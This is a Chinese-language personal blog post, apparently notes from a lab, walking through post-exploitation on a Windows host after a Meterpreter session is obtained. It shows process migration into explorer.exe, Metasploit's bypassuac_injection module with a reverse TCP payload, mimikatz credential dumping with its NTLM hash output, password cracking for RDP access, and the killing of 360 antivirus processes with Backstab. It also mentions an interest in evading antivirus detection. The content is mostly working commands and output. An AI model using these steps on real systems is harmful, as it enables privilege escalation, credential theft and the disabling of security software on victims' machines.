Post Pentest 101

记录一些后渗透的操作
10/69的马过一周变20/68了，今天丢虚拟机直接报毒，看来免杀上还得多学学

获得了meterpreter会话之后的操作

ps | grep 360
PID   PPID  Name              Arch  Session  User  Path
---   ----  ----              ----  -------  ----  ----
1104  1672  360Tray.exe       x86   1
6272  1104  360Safe.exe       x86   1
6380  6272  360leakfixer.exe  x86   1
ps | grep Hips
PID   PPID  Name            Arch  Session  User                  Path
---   ----  ----            ----  -------  ----                  ----
1152  188   HipsTray.exe    x86   1
5268  6172  HipsMain.exe    x86   1        DESKTOP-653VJP2\Kira  C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsMain.exe
5444  624   HipsDaemon.exe

将进程迁移到资源浏览器中

1
2
3

ps | grep explorer
3936  4916  explorer.exe  x64   1        DESKTOP-653VJP2\Kira  C:\Windows\explorer.exe
migrate 3936

这里有一点需要注意，如果meterpreter在bypassuac之后获得了高权限，但是继续向低权限的进程迁移的话，会被降权

使用bypassuac获得Administrator的权限(火绒稳定拦，确切来说是直接把上传的程序给删了，360有时候会拦)

use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.103
set LPORT 9876
set target 1
set session 3
run

因为系统版本问题，不能用"bypassuac"，只能用"bypassuac_injection"，所以会莫名其妙地触发了个"SQL Client Configuration Utility EXE"的UAC，然后导致了MSF那边收不到session
另一台电脑上试的时候用的是"bypassuac"，倒没问题

这里需要注意一点
target参数需要与目标机器上的操作系统相对应

show target

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

使用mimikatz模块导出Hash

1
2
3

use kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

得到Hash

Authentication Id : 0 ; 396268 (00000000:00060bec)
Session           : Interactive from 1
User Name         : Kira
Domain            : DESKTOP-653VJP2
Logon Server      : DESKTOP-653VJP2
Logon Time        : 2021/8/22 17:27:49
SID               : S-1-5-21-413531007-3663720574-771213360-1001
	msv :	
	 [00000003] Primary
	 * Username : Kira
	 * Domain   : DESKTOP-653VJP2
	 * NTLM     : 38uZAEr4UA7uUYqgCEsBEDJJRsnnsZ2dUt
	 * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
	tspkg :	
	wdigest :	
	 * Username : Kira
	 * Domain   : DESKTOP-653VJP2
	 * Password : (null)
	kerberos :	
	 * Username : Kira
	 * Domain   : DESKTOP-653VJP2
	 * Password : (null)
	ssp :	
	credman :

NTLM的加密算法为MD4，爆破起来不算复杂
这里密码是123456
拿了密码基本就可以rdp登入上去操作(关杀软)了

管理员权限下taskkill只能关掉360Safe，不能关掉360Tray与ZhuDongFangYu

之后可以使用backstab来干掉"ZhuDongFangYu.exe"进程
在新装的虚拟机上运行提示缺少下面两个dll
VCRUNTIME140D.dll
ucrtbased.dll
64位系统上，64位dll路径为"C:\Windows\System32"，32位dll路径为"C:\Windows\SysWOW64"
如果实战跑不了这玩意，估计得用screenshot看看是什么情况

拿这玩意杀不掉360Tray，反而一个开始占CPU一个开始占内存
估计是360在竞争生成进程，Backstab没有做内存释放的机制
最后导致虚拟机卡死
明天换台机器试试

公司机器上开虚拟机关360主程序的时候360Tray会自动退出，然后就能干"ZhuDongFangYu.exe"
就很玄学